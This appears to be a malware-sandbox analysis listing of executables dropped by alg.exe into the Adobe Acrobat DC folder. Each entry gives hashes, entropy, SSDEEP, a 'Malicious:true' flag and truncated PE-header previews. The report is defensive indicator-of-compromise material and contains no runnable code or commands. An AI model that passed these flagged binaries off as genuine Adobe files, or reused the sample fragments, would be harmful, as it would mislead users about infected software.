                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:8A95E4E04B681F49BBB8BA296D9B5530FA699FE55C263FC16FE193D01DF41CCF8F569D4890A802AD5EFA9220786F588AA2E379D13B7CD0DBE19A45C74064B138
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../..........@......f!.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc....p...`.......*..............@...........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1222656
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.702488998907658
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:jAdzN/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:jAdBLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:8F56BE84E7061A4274D557B8BA21E64B
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:D2C3841CF045334C4265975B5080ED88A65BCC7F
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:3088116375CFEA0540BC4A9AB451D452D42BEEC237DAE8367BCB5A9C6C7F7368
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:8A98B50616FBE77AD8761B74C38477E60B2AE6D4EE36F724570E8CDA677D71D0669376AF9A602831EE67DE1092536D9FD0AFDFBC240E9A45AAF2E1423044511C
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4.F.4.F.4.F.LEF.4.FE@.G.4.FE@.G.4.FE@.G.4.FE@.G.4.F._.G.4.F.4.F%4.FG@.G.4.FG@)F.4.F.4AF.4.FG@.G.4.FRich.4.F................PE..d......d.........."......6.....................@.....................................A.... .....................................................|....P..h........9.....................p.......................(...P...8............P...............................text....4.......6.................. ..`.rdata..>....P.......:..............@..@.data...............................@....pdata...9.......:..................@..@.rsrc...h....P......................@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1613312
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.680227420123107
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:rvliJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:F/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                        MD5:ABB24D17BEAA0A4CE3F95E25F00CF11B
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:5084A87240216B9C1EFF591A5E38C1F590F00061
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:DF587E637570AABF7856E451E87B0717881D2C958C6BECED0BC48BC2073082FF
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:33C1866E451920BFCC6C4A38D5B94BF63406A2F0AD52BBD1362EE2799C9BE2C381D92219F7F12A8712806D6B58FED71E1A4203DA8FCC528BFA28638B646FE814
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......]../...|...|...|B..}...|B..}...|...}...|..S|...|..}=..|..}...|..}...|..}...|..=|...|o..|...|B..}...|...|...|..}...|..Q|...|..9|...|..}...|Rich...|................PE..d......d.........."......H...........&.........@..............................#.....#x.... .................................................@...,....@..........4......................T.......................(...@...8............`...............................text....G.......H.................. ..`.rdata.......`.......L..............@..@.data...............................@....pdata..4...........................@..@.CRT....@....0......................@..@.rsrc........@......................@..@.reloc...`...P......................@...................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1616896
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.046911902787726
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:R5zhM1XSck/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:NMsVLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:2F76BDC1E70B3832A2AC97F30914EEB3
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:7DA1F18E4C73880DBBF7CEB4407EDD361ABB5CCA
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:CBAF8D9BAC7041645F5DDA67714B15FD92D82236EE23F64C2A900568D5B03E9D
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:A3261FFE7875E1BC33FEF699AE5B683160170E5A04099106CEB82C84042C66CABF5C743FAF514B03D2C8D9E86EF2A9898BEF3D18CE99E466D735158BB6EF9FA0
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........<$.Rw.Rw.Rw...w..Rw5.Vv.Rw5.Qv.Rw5.Sv.Rw7.Sv.Rw..Vv.Rw..Tv.Rw..Sv..Rw.Sw..Rw5.Wv.Rw.t/w.Rw.t?w..Rw7.Wv.Rw7.Vv.Rw7.w.Rw..w.Rw7.Pv.RwRich.Rw........PE..d......d.........."..........z......@..........@..............................#.......... ................................................. A...................+......................T.......................(.......8............................................text............................... ..`.rdata..............................@..@.data....d...`...\...T..............@....pdata...+.......,..................@..@.rsrc............0..................@..@.reloc...`...0......................@...........................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4151808
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.497783907481587
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:8tuUC0nNc/RcYHCY9AWWnURqdHIEogMAYrukdUmSC+bXMZQU1QqpN7553LNiXico:8jEIa4HIEWOc5B7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:B609234EC835F5CF44B446EA6F9F2FBF
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:D39B7B790D3824C4647133355607E052C97002AE
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:A886FE029A0C9891F29029436B9A134E13C8F73C91E3A1DD26BD27CFB44FF994
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:0A22284E31E71043A3D1F203EFC10FFD601A96E43370D447B097E2030BA20AFDAA8541ADD31FA99FBFFAB95508E2E45C9B4B194F7181FCA6F65BCF329C7266D4
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.......?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):59941376
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.9993603686398425
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1572864:UQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:LXhwMhe6AABPiQwF6xQ22R
                                                                                                                                                                                                                                                                                                                                                                                        MD5:FB306BA2FCE04A800F07F7C2A115AB78
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:99BDA4AF0A392D72D806593A9C741C90F9181F43
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:EC85E3F5737D13DFE9070A000E7B24C37C2ED7BCF915E7275EC416143A4CE014
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:D84C68EFD948067CE0FF3D773A494704AE3F0F48C833EC274D785B561DE3F21A97E412AA678BF55300BB65CC0402C0747F97045E2950231793901AD1F17FBDBF
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0......X..... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1335808
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.597035587160331
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:gWdiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:gs/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                        MD5:8074D98E5144007184CD67B766E1F61D
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:77DCF8EAB1BE61441D68ED433DA86DD6242EC422
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:A861980B957CA3B2A8C34D843950E3C9C3CAC02EA915A61F9EEF1F84B09BE357
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:4D71D44ADC2AB04F9A60A4A8D8B137D4A508DEECDC84B113790EA8B010045833B2A0F0309062EDC6388C403D776A31DEC1EBF182B5B82C8151C861138E74881A
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e....b..b..b.|...b.epf..b.epa..b.epg..b.epc..b.oc..b..c.2.b.gpg..b.gp...b.....b.gp`..b.Rich..b.................PE..d...R..d.........."......l...Z.......m.........@.............................P......\j.... .....................................................|.......p.......@.......................T.......................(.......8............................................text...>k.......l.................. ..`.rdata..J:.......<...p..............@..@.data...............................@....pdata..@...........................@..@.rsrc...p...........................@..@.reloc...`..........................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):6210048
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.385275781417689
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:DDvZEaFVUn+Dpasot2xQevgjCGT7lmPIionqOgBhGl6zVLkVEk3yV07U24GEQTXq:snN9KfxLk6GEQTX5UKzNDG7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:D4CFAF37BC53FA040C33CF2FDD0B9ECA
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:DBB1E377CAC2FB46DE680D7D6B0F7FBD0736C556
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:F36A9535B57057534E9BB1E53DF0694CFF6EA1F88F19D9F53DEA3E4776C94722
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:514611D2A6207D4181E3A787963101DF7E959CCA18A4111DA269119EF7BCDDDBE53298A41787D24043D0C23010376C8F72C788C4EDD96071E2ADFD4880C72908
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......;..j...9...9...9k..8r..9k..8...9...8l..9...8t..9..p9|..9...9...9...8...9k..8\..9k..8}..9k..8n..9...9...9...8Y..9...8~..9..r9~..9...9|..9...8~..9Rich...9........................PE..d......d.........."......V4..,"......L(........@.............................._......._... ..........................................<F.|....EF.x....0K..V...@H......................n;.T....................o;.(....:.8............p4..... .F.`....................text...,T4......V4................. ..`.rdata..@....p4......Z4.............@..@.data...l.....F......nF.............@....pdata.......@H......vG.............@..@.didat.. .....K......>J.............@..._RDATA....... K......HJ.............@..@.rsrc....V...0K..X...JJ.............@..@.reloc...0....V.. ....U.............@...................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1312768
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.548400068242816
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:4aiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:48/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                        MD5:528D29B13CE5050E170DA23F8F27DDC6
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:09E89797FBB64A28B57A349DF22C742D893A3ACA
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:D4284CB1C3F63895E3FC3290566AD9601142ABC85614BDC93FAD8AC773D21772
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:0F91448908BD7C0B458DD84578DE36ED49BC665F121262BA6596694DB969073AB9E4F58AE8DA9421B7E182C0EEDC39EFE9AC73770F73F359FB472BEEFB6CE087
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.tKx...x...x...q..t.......c.......r.......{.......~...l...}...x...........|.......y...x...y.......y...Richx...................PE..d......d.........."..........>.......0.........@.....................................j.... .................................................lV..........h...........................PI..T....................K..(....I..8............@...............................text....,.......................... ..`.rdata..4"...@...$...2..............@..@.data........p.......V..............@....pdata...............X..............@..@.rsrc...h............\..............@..@.reloc...`...........h..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):12039168
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.595975797983477
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:98304:Rb+MzPstUEHInwZk3RBk9DdhgJCudq1uVIyESYgKn7wRGpj3:tnPgTHIwZoRBk9DdhSUEVIXgK7F9
                                                                                                                                                                                                                                                                                                                                                                                        MD5:17B24F35647E7FD417015C2802BF4801
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:FE61D4F4A36998D3AFE17AB3941821F1F69FB2F3
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:CCA5D5D91D8744FFDCD03C848181547AB724DCB8D5222A132D87AD19CDAE6B2E
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:1039CCD19752C70F1CAF2479D7EFED1520CB7C74D204B30B0B043CE4AE520AB62D5389FCCC322D6A19ECA87BF1AFD3BA7CB773DD8AEE2557BF251A758A1F8324
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......&.w.bb..bb..bb..v...lb..v...b.....qb.....hb......ab......b..E.t.Vb..E.d.jb.....ib......b..v...|b..v...cb.....`..bb..}b..v...Ab..bb..,`.....b.....cb.....cb..bb..`b.....cb..Richbb..........PE..d......d..........".........../.....0.F........@.....................................#.... ............................................\...,..h........G......Lz..................P..T......................(......8...........................................text............................... ..`.rdata..f. .......!.................@..@.data..............................@....pdata..Lz.......|.................@..@.didat...............X..............@..._RDATA...............Z..............@..@.rsrc....G.......H...\..............@..@.reloc... .........................@...........................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1478144
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.8298870322350105
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:4g5FvCPWs3/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:dfFALNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:78595D24AB8A78FDD3D7B4AF78A80DDD
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:5DC083201D9B6AE4F0F871D29A66ABBE51F7EC76
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:657E73C3B14C809CD1F45C208B5DA8CA3F41BDB1B4CBEF9BECEE5E837AA7DB7E
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:6C32BF518C46E60F91A6AB577912E21F640597E59243E93F1A34D52698BCA874ECF9CEA7CEEB10AB7DAC549422337936B2ED7E8D44BFD5772040487F14CD9A6B
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ z.A...A...A...9...A..O5...A..O5...A..O5...A..O5...A...*...A...A...@..M5...A..M5.A...A...A..M5...A..Rich.A..................PE..d......d.........."..........b.................@..............................!.....N|.... .................................................X...h....p..p....P..t.......................T.......................(.......8............................................text...,........................... ..`.rdata.............................@..@.data........@.......&..............@....pdata..t....P......................@..@.rsrc...p....p.......B..............@..@.reloc...`... ......................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1339904
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.202750765814141
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:6jKTIsAjFuvtIfmFthMaT5U8aChaeuF/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:6jIMmPh7TT79YLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:FA230D8D2F1F73EEBA270CBFBDDF977E
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:AB940CCF34F89D2E60412580BAA55201468A2304
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:0A7CB73BCFAAD55B4ABB8B8411733284DE8F719B2243A595162053D4F7A6D536
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:FFB2741CB2D0ADF98E9C032F4F84A5AA6BB08F0AC79CE79512D5095C2C38F8295642BD5C8313E870B4AA03AF707E213543459325738026C067ED8C4FBF660290
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$......................................s...X............................[....U=....................h...n......n.Y.....1....n......Rich...........PE..d......c..........".................0i.........@..............................$.....\..... .................................................H...d............@..Tx......................p...................`...(...`................................................text............................... ..`.rdata..@...........................@..@.data....>......."..................@....pdata..Tx...@...z..................@..@.rsrc................z..............@..@.reloc..............................@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1671168
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.008260224588016
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:FGqVwCto1em5WgJ/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:0Z1emU2LNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:54A872BDD93F4C9F5544706B6E2FB44C
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:9361731802AA2D3C86526DCEB4A368D3944C3CFC
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:9D096BBC0E31E829EBE1DC0EE582187E91759F0417ABB4DB8F9BE538478DC1DF
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:75BC58AE41C2285BCBD7999D9F65B59BBB7E9451625323951282F7FFBBBB41B9B2025317A122D0D3F056CDD03812CD78E98FDBBCC3330D624F55802C26B96D66
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................v......................................a..X.....X........r....X.....Rich...........PE..d......c.........."............................@..............................$........... .................................................. ...........v..............................p.......................(....................0...............................text............................... ..`.rdata..Z$...0...&..................@..@.data...x"...`.......@..............@....pdata...............L..............@..@.rsrc....v.......v...j..............@..@.reloc...`...0......................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1409024
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.690544707669362
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:bWBW0/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:OLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:50510CFC98DD5FD586154EA7BA39CEA7
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:ABE0C5CAA505782CD4333CD26B25824F88221D9A
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:B861607214592094D25B520F0E9A3ED19D61696ABEA38A06BBD44B5F8C76AA82
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:DF4D764100C1B94CF98C300CA933981FD8B6294BE8AEC704D53D6AF6E9CFAC37B7A0A098D5118F9822190385195F6EB921166B4A013B4ED37F6D62FEF032103A
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1.v.Pc%.Pc%.Pc%.(.%.Pc%C$g$.Pc%C$`$.Pc%C$f$.Pc%C$b$.Pc%.;g$.Pc%.;b$.Pc%.Pb%EPc%z$f$.Pc%z$.%.Pc%.P.%.Pc%z$a$.Pc%Rich.Pc%................PE..d...DC,d.........."............................@.............................p ......t.... .................................................h...@.......@............................Q..T....................S..(... R..8............0...............................text............................... ..`.rdata..$....0......................@..@.data...............................@....pdata..............................@..@.rsrc...@...........................@..@.reloc...`..........................@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe

                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1683968
                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.223541515885686
                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:7+GtCi27mVTyT+a0iLNiXicJFFRGNzj3:qmd27p7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                        MD5:3F81575436F1D1392A69AE79BA995904
                                                                                                                                                                                                                                                                                                                                                                                        SHA1:F4A99C65FC4293079F6A5C1BC8BF8E299D083906
                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:EF56AAE0DA405C3049335D333412B9B1F1C05522178144EB575A8809A9B6F801
                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:0FC077416DA0D6ADDC939977A6CA8CBEFEDCC3C6FE06E81B7F1101A5D5B63AC957FE284A92086D4D310CA9AAAA2AA4218B31205CB37C032C5FB952EFB34217C9
                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
